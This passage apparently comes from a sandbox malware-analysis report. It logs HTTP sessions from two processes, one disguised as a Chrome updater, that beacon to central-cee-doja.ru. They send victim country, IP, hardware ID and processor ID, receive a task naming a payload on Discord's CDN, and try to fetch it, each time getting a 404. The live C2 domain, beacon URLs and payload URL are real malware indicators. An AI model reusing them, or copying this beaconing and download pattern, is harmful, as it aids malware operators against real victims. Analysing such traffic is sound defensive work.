                                                                                    2024-01-04 07:31:13 UTC213INData Raw: 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: oding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    159192.168.2.649883104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:14 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:14 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F9Gd5yizD32DO4EMYrWHeUBsNROoyZpEfxUn5oopHgReWa%2FkMJwnKf6YrMvsrAwNLTcD4zYt8PXrCoLvVw0yo%2BMsn62spwMGHqz4aW573C6JFh%2BgqFibm4CuNAdF3RVKcE4U%2BdPf"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7de0e158278-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:14 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    160192.168.2.649884104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:14 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:14 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:14 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OhVzu0NBRzP4gpQnmnexzBGkO14gdAYysr%2FIOrgYyNhkgByvmbz0g0BhPQQadx5WwXHd3UegAXuzrFV0GbR4mmYlWFlRICEdNo%2Ff2QcymawfkHn40XblWJtMThrHd%2F8%2Fh9DBR%2FQn"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7deef0320c3-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:14 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    161192.168.2.649886104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:14 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:15 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NF2jnf7Rcdh1VQ6FVWnXg%2B%2FQTXTQogXP7tB0Nucr0lWCZ%2FIZBS%2FZQwlYknIV39j%2FuEeChas%2F3l8eRJEUfefCquKmDJMZsRFJRjJdtezCJURsQKo51iMbWMuapGuLuqm6U1jB5HDF"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7e3cfa18f0a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:15 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    162192.168.2.649887104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:15 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:15 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:15 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7sS0qXjvNLbELmZb9H8e%2BgyweK%2BwfVRo0dBmuUffVoF7dvwx1W%2B9IY0SAUBagLjAPFY2d4a2MxhcMDcpsJKH1b7qi1eeGADZv8RrYLp2nwfyYoWUYXnLiE9qfNsdib2Lt15RCvr8"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7e4bf162070-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:15 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    163192.168.2.649888162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:15 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:15 UTC1330INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:15 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7e80abf5b6a-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 35
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:15 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHA
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=wGOc7ztRGKA8WhO97Q7kOiBTZxpYkDPK9phcgSQRJKg-1704353475-1-AWIaVF5/Oac6YSEdXuO2xIdoQsAHi//Rj6UZaEHd0qYbKVN9PP44g+Pi+FHC6bQVCGhutSQPRFBy4uS5Dj8v2RQ=; path=/; expires=Thu, 04-Jan-24 08:01:15 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9d9iGZmDEzl8kkMoIVVrwbsnvlluT0ZWW5y3Ry%2BoyxFvpFVAmSpr5vF9k70xQc8pcttjHDGw5%2FPxuX1vrXWwYrC4K3pi53tdaF55cZm9KJfFuBJMiZjEAf3wSGvHKo82T83HtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=N5aNRJ5vzbA5VslmH2cme_HsA8v.jDfjMDvC7sgSiZE-1704353475879-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:15 UTC39INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><
                                                                                    2024-01-04 07:31:15 UTC197INData Raw: 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    164192.168.2.649889162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:15 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:16 UTC1343INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:16 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7e8eb1705dd-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 46
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:16 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSs
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=FfIqBGOcq3Y91P65qBdhsiTtGU51u499dp2mi_MMEKs-1704353476-1-AfcTDhYb1PiYNS4UZwWobZIJt2MVV15Fh9z5GsEHWwAyXb9Kx9tMNdOkNxWGpaevbHC9mdjqhSZa0+zJGKmyiOc=; path=/; expires=Thu, 04-Jan-24 08:01:16 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tCWvKRM7K%2Bom0ImKbZJxqlwOH5wgvx1O%2Bx%2FjPiSVnd%2Fu7H2kw4tZ%2FmmOWLVVX1Wjscne%2Fgt7iRDk%2B464pu8r%2FBBzjbstXOs3mCirGMkIf6vla9GpCMurY1pVKVHQ2MmpxhAsSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=Shko7.bDFBOZJgm3K6SMThzmqfFK1s.99shx2rYgWrY-1704353476023-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:16 UTC26INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69
                                                                                    Data Ascii: <?xml version='1.0' encodi
                                                                                    2024-01-04 07:31:16 UTC210INData Raw: 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ng='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    165192.168.2.649890104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:16 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:16 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:16 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JZa3ZVBdmUPmwmkCiAXcW8bhzNR4%2B%2Fw6lZDq2Ax0TXw2ByBu5BCmGVyz6MwaIXc%2FNi%2FxWNoeNotdVZdHJo7hz82SQzEbilJpLkXSibkjt0PEyvcePX0FqcZTvI6zspoYGhIXdYpu"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7ebb9c36fa3-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:16 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    166192.168.2.649891104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:16 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:16 UTC584INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:16 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yvjjLxYZY6pV1vUdL01rA613OiYK0ynTO6z3qaK0PRuxZj9qHY1X6lpZWLRy74KLF61eTJEGUyHB%2Bbrzt%2B9mI1La8gi9bbvabkeDmaelfzeySRc%2FwLO74%2BO3GBMFtD%2F7RD%2Bdn%2Br9"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7ec99f97fff-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:16 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    167192.168.2.649892104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:16 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:17 UTC593INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r57kYjgwvkGuvQgbvaVrTAygUvU9dS2ChCbSfRPrP2ccs45FUv7xkZfBibvthZU5dWNolBIInC7mxtaleyTgWs02ecnMqR53AqW6XvYXfDRNyoSJsAyIuUOY2pgeM13djA5bJexC"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7eff8131fd3-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:17 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    168192.168.2.649893104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:17 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:17 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:17 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p22Ib0T20rRdcIj%2FBo5QV1Pv9Vcsvm%2FpbZMHiieU%2BIT%2BVtIFgyUgdJtRST0WFOgxevonTrcBJlU54h7PV6CsAcRfd3CVFv61jGKe4t0LIG%2F4zQD0rQ0tIuK1dayiFYPL6PzYobGJ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7f0fff28003-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:17 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    169192.168.2.649894162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:17 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:18 UTC1342INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:17 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7f54eb62d11-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 59
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:17 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=kt_HJtFov0.Uuhjt8ZtPoJELDgN9nhAYs8YHfFOrdjY-1704353477-1-AXfQvqY9Kv/BAUaQlIIpFMNksJRqrSTZ8WfyKWw6iTD+cH+52QmnSynTAHiipUyBXsbmWoHpvJhfHCyayyIHAB0=; path=/; expires=Thu, 04-Jan-24 08:01:17 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cHXkTk5sTkFKMeXNzsogEb9VJkdaAhhu53bZeCASn5JPxL%2FVNK0%2F2uxxisDlmCRd8xzlK0AaXEphvA390TXmy5S4KQKXQAF4GqZD1q2mS3YWTDZp37TnWXW%2B%2BQ1LMnkmxhp1Vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=FQurS8cwzD7KEGXPG0vbpI0MnpwF0l03FtOjR9Sm5hk-1704353477985-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:18 UTC27INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e
                                                                                    Data Ascii: <?xml version='1.0' encodin
                                                                                    2024-01-04 07:31:18 UTC209INData Raw: 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: g='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    170192.168.2.649895162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:17 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:18 UTC1331INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:18 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c7f558c207fa-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 53
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:18 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
